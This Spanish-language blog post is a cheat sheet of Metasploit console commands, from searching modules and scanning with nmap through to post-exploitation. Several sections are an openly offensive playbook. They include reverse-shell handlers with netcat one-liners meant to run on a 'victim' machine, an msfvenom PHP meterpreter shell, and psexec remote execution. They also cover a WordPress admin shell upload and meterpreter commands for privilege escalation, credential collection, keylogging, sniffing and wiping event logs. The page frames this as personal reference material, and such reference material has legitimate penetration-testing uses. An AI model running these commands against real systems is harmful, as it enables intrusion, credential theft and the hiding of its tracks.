Español
EninSoft – recursos para programadores web
EninSoft - recursos para programadores web > Eninsoft > HE > Comandos básicos para la consola de metasploit

Comandos básicos para la consola de metasploit

  • mayo 16, 2019
  • Categoría: HE
No hay comentarios

Importante: Esta información es para uso lúdico personal. En ningún caso se pretende dar conocimientos, consejos, formaciones, herramientas, ni soluciones técnicas de ámbito comercial ni profesional. Simplemente es información que se ha redactado en finalidad de recordatorio de ciertos proyectos realizados. Si usted no está seguro de la fiabilidad de la información, no cumple con sus expectativas o no es de su agrado, le ruego que abandone este sitio web. Para ver todas las exclusiones garantía y de responsabilidad acceda a la sección Aviso Legal.

Metasploit es un framework para la explotación de vulnerabilidades que pertenece a la empresa Rapid7. Entre sus variantes de funcionamiento, aquí se detallan los comandos básicos para su modo consola.

Actualizar Metasploit

msfupgrade

Entrar en modo consola

msfconsole

Ayuda

help

Buscar playload, exploit, auxiliars, …

search name

Buscar por CVE

search CVE:2014-3245

Información de un playload, exploit, auxiliar, …

info name

Uso de un playload, exploit, auxiliar, …

uso name

Mostrar opciones del playload, exploit, auxiliar, …

show options

Volver atras

back

Asignar una variable, por ejemplo, RHOST

set RHOST 192.168.1.1

Asignar una variable global, por ejemplo, RHOST

setg RHOST 192.168.1.1 

Estado de la base de datos

db_status

Uso de la base de datos para guardar información

msfdb init
db_connect -y /usr/share/metasploit-framework/config/database.yml

Ver la tabla de hosts

hosts

Ver la tabla de puertos

services

Ver la tabla de credenciales

creds

Buscar un elemento en una tabla, por ejemplo, linux en hosts.

hosts -L linux

Borrar un elemento de una tabla, por ejemplo, en hosts

hosts -d 3

Importar un escaneo de nmap en formato xml

db_import /root/nmap.xml

Lanzar un escaneo con nmap dentro de metasploit

db_nmap -sT -p- -sV -O 192.168.1.1

Contraseñas en texto plano

load minikatz

Ejecutar comandos pc remoto con psexec.

use  exploit/windows/smb/psexec  # rhost, smbpass, smbuser

Abrir un puerto para conexión reversa

use exploit/multi/handler
set LPORT 4444
set LHOST 192.168.2.100
exploit

Abrir un puerto para conexión reversa y conectarse con a él con nc (LINUX)


# Maquina local
use exploit/multi/handler
set LPORT 4444
set LHOST 192.168.2.100
set PAYLOAD linux/x64/shell/reverse_tcp
exploit

# Ejecutar en máquina remota (víctima) via webshell o similar.
nc 192.168.2.100 4444 -e /bin/bash

Abrir un puerto para conexión reversa y conectarse con a él con nc (WINDOWS)


# Maquina local
use exploit/multi/handler
set LPORT 4444
set LHOST 192.168.2.100
set PAYLOAD windows/shell/reverse_tcp
exploit

# Ejecutar en máquina remota (víctima) via webshell o similar.
nc.exe 192.168.2.100 4444 -e cmd.exe

Convertir una conexión establecido tipo shell a meterpreter.

use post/multi/manage/shell_to_meterpreter

Crear una shell reverse php para meterpreter

msfvenom -p php/meterpreter/reverse_tcp LHOST=XXX LPORT=YYY -f raw -o s.php

Abrir socket para conexión reversa para la shell php meterpreter

use exploit/multi/handler
set LPORT 4444
set LHOST 192.168.2.100
set PAYLOAD php/meterpreter/reverse_tcp 
exploit

Módulo auxiliar para realizar un escaneo.

use auxiliary/scanner/portscan/syn

Módulo auxiliar de análisis de versiones SMB

use auxiliary/scanner/smb/smb_version

Módulo auxiliar de análisis de FTP anónimos.

use auxiliary/scanner/ftp/anonymous

Cargar un payload en un exploit para abrir una shell.

set PAYLOAD windows/shell/bind_tcp
set PAYLOAD windows/shell/reverse_tcp

Cargar un payload en un exploit para abrir una session meterpreter

set PAYLOAD windows/meterpreter/bind_tcp
set PAYLOAD windows/meterpreter/reverse_tcp

Meterpreter


# básico
> sysinfo  # muestra información básica del sistema.
> reg -h  # modificar claves del registro.
> cd  # cambio de dir.
> cat  # mostrar contenido fichero.
> upload  # subir ficheros.
> download  # descargar archivo.
> ps  # lista de procesos.
> getpid  # proceso que estamos ejecutando.
> kill  # matar procesos.
> execute  # executar procesos.
> ipconfig  # mostrar interfaces de red
> idletime  # muestra el tiempo que hace de la ultima interacción del usuario.
> background  # enviar sesión en background.
> sessions -l  # listar sesiones abiertas
> sessions -i ID  # usar una session.
> search -f *.pdf  # listar todos los archivos pdf.
> search -d c:\\temp  # buscar en la destinación especificada.

# escalar privilegios.
> getuid 
> getsystem
> migrate PID
> run scraper
> run winenum
> run credcollect
> run getcountermeasure
> run remotewinenum

# sniffer
> sniffer_interfaces
> sniffer_start id_interfaces
> sniffer_stats
> sniffer_stop
> sniffer_dump

# keylogger
> keyscan_start
> keyscan_dump
> keyscan_stop
> screenshot

# borrar logs
run event_manager -i
run event_manager -c  # borra todos los logs.
clearev  # borra todos los logs.

Subir una shell en un wordpress usando Metasploit.

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.1.10
set targeturi /wp
set username yyy
set password xxx
exploit

comandos metasploit msf msfconsole rapid7

Buscar

Publicaciones recientes

  • Cómo comprar una Play Station 5 (PS5) en MediaMarkt
  • Crear un USB Parrot OS con persistencia desde Linux.
  • Configurar PHP-FPM con varios usuarios/grupos para servidores multihosting. PHP-FPM 7.3 – Debian 10 Buster.
  • Cambio de Apache Handler (ModPHP) a PHP FPM 7.3 en Debian Buster.
  • Eliminar los indices numéricos en Mysql PDO fetch registros.

Categorías

  • benchmark
  • bug
  • clúster
  • correo
  • css
  • desarrollo
  • documentación
  • framework
  • hardware
  • HE
  • imagen
  • java
  • jquery
  • linux
  • mac (osx)
  • minar
  • monedas virtuales
  • mysql
  • pci dss
  • php
  • python
  • redes
  • SAP
  • seguridad
  • Sin categorizar
  • sodimm
  • utilidades
  • virtualización
  • WAF
  • web
  • windows
  • wordpress
Copyright © 2018 EninSoft.com. Todos los derechos reservados
  • Aviso legal
  • Política de privacidad
  • Política de cookies
Buscar

Utilizamos cookies para darte la mejor experiencia en nuestra web.

Puedes saber más sobre qué cookies usamos o desactivarlas en los ajustes.

Política de privacidad
EninSoft - recursos para programadores web

Esta web utiliza cookies para proporcionarte la mejor experiencia de navegación posible. Estas cookies son guardadas en tu navegador y cumplen funciones como reconocerte cuando regresas a esta web y ayudarnos a saber qué secciones de la web encuentras más interesantes y útiles.

Cookies estrictamente necesarias

Las cookies estrictamente necesarias son aquellas fundamentales para el correcto uso de la web. No guardamos ninguna información sensible en ellas.

Si deshabilitas esta cookie, no podremos guardar tus preferencias. Esto implicará que cada vez que visites nuestra web tendrás que habilitar o deshabilitar las cookies de nuevo.

Cookies de analítica

Esta web usa Google Analytics para recoger información como el número de visitantes o las páginas más populares.

Por favor, activa primero las cookies estrictamente necesarias para que podamos guardar tus preferencias

By  GDPR Cookie Compliance